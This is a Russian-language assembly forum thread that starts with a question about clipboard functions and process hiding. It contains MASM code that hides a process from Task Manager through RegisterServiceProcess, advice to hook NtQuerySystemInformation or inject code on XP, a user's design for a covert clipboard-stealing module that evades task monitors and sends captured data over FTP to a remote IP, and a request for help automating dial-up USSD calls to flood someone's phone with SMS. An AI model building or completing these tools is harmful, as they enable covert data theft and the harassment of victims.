1. Заголовок или название темы должно быть информативным 2. Все тексты программ должны помещаться в теги [CODE=asm] [/CODE] 3. Прежде чем задавать вопрос, см. "FAQ",если там не нашли ответа, воспользуйтесь ПОИСКОМ, возможно, такую задачу уже решали! 4. Не предлагайте свои решения на других языках, кроме Ассемблера. Исключение только с согласия модератора. 5. НЕ используйте форум для личного общения! Все, что не относиться к обсуждению темы - на PM! 6. Проверяйте программы перед тем, как выложить их на форум!!
Работа с буфером обмена..скрытие процесса от диспетчера задач
Очень хотелось бы разобраться буферами окошек..только к сожалению не получается связать многочисленные функции по работе с...Сlip.. в единый кусок..Если не трудно приведить примеры работы с буфером-какие функции и в какой последовательности вызывать, нюансы ,если есть. Также
Код
.386 .model flat, stdcall
include windows.inc include user32.inc include kernel32.inc includelib user32.lib includelib kernel32.lib
.data mens1 db 'This process was hidden of control+alt+del box!', 0 mens2 db 'Now, you can see it...', 0 mcaption db 'Program: Hidden Process... by CybOrgAsm, POA - Brasil', 0 kernel32 db 'kernel32.dll', 0 func db 'RegisterServiceProcess', 0 ; undocumented.
.data? RSP dd ?
.code start: invoke GetModuleHandle, ADDR kernel32 or eax, eax jz sair
invoke GetProcAddress, eax, ADDR func or eax, eax jz sair
mov [RSP], eax ; save the address
push 1 ; hide push 0 ; 0 = this process call RSP ; call it
push 0 ; well.. we don't have a function called ; "UnRegisterServiceProcess" BUT... ; if you put a 0 , you will "unhide" it >:) push 0 ; this process. (but what about unhide others?) call RSP ; call it
программа нормально работает под XP до второго сравнения битов результата и выходит по Exit.. И вообще смысл не понятен-получаем смещение вызванной первой функции получения хндла этого приложения , вызов RSP c непонятными параметрами..???доведите понятного средними умами, плиз..
чушь несете, товарищ... программа работоет нормально, только вот способ скрытия у вас со времен денозавров и на сколько йа знаю работоет тока под 9х. под хр хукойте NtQuerySystemInformatiоn либо можете инжектеть свой код в чужой процесс. насчет клипбоарда - в мсдн все детально расписанно. сделой код, а мы его есле что поправем :
O-o-o...цепляющие файлы к процессам, пока дождешься вашей милости состаришься и забудешь пароль.. Никто никого за язык(пальцы) не тянул, и да не оскудеют ваши знания избавить этот код от ошибок при внесении значения в реестр записи в фаил, и клипомбоардом...
Вот что-то вроде getClipBoardDataТырящегоFtp-клиента..
include \masm32\include\windows.inc include \masm32\include\masm32.inc include \masm32\include\gdi32.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\Comctl32.inc include \masm32\include\comdlg32.inc include \masm32\include\oleaut32.inc include \masm32\include\Advapi32.inc
push NULL Call GetModuleHandle mov Sam, eax jmp begin
begin: Работать эта хреновина должна следующим образом: модуль где сейчас находится этот текст запускается с низким приоритетом основной программой и находится в бесконечном цикле в котором определяет использует ли какое -нибудь приложение ф-ю NtQuerySystemInformatiоn(ведь именно она используется приложениях подобных таск мжр..хотя есть и другие..) то есть ищет процессы которые грузят библиотеку Ntdll.dll , определяет соответствие процесса классу gui объекта(ведь это может быть не только окно но значок в трее)-тоесть активно ли приложение следящее за процессами.. если да то сворачивается -через некоторое время основная программа снова проверит наличие палева и если что запустит.. если палева нет-скидывает определенный объем символов в фаил и голубиной почтой посылает по фтп на 4 трехзначные цифры разделенные точкой.... напишите подробно код который делал бы это(ИСКал диспетчер задач и ему подобных) .. а то не получается и времени не хватает ..или аналогию, только не надо рисовать тут про API спласинг и трапing
В курсе что все это напоминает метод пьяного тракториста..но что делать..)
Да и еще.. Телефонное хулиганье хорошо организовано и прогрессирует...НО.. Наш местный оператор сотовой связи имеет небольшой грешок-при наборе на сот. трубке ussd запроса для отправки смс-ок с просьбой чтобы мол перезвонили, количество этих самых наборов и соответсвенно смс не ограничено, а фильтров смс в телефонах что-то не встречал.. Самое простое-подключается телефон в качестве модема и вызывается "подключение уделенного доступа" без всяких проверок(это все в настройках подключения ) набирается номер типа *13x*xxxxxxxxxx#(там же) Какой функцией вызвать окно соединения? с классом #32770 не имеющего процесса или скрытого -хрен его знает
include \MASM32\INCLUDE\mpr.inc includelib \MASM32\LIB\mpr.lib
invoke WNetConnectionDialog,hWnd,RESOURCETYPE_DISK--сетевой диск мне нафиг здесь не нужен
RESOURCETYPE_DISK ---какой должна быть переменная??????
Дальше ясно через таймер окно закрывается и вновь открывается и шлет письма счастья
помогите.. с вызовом(конечно можно и другими способами набирать..надо так) а то резервный 133 пень ждет 12 часовой работы в фазу полной луны, а кто-то наверняка мечтае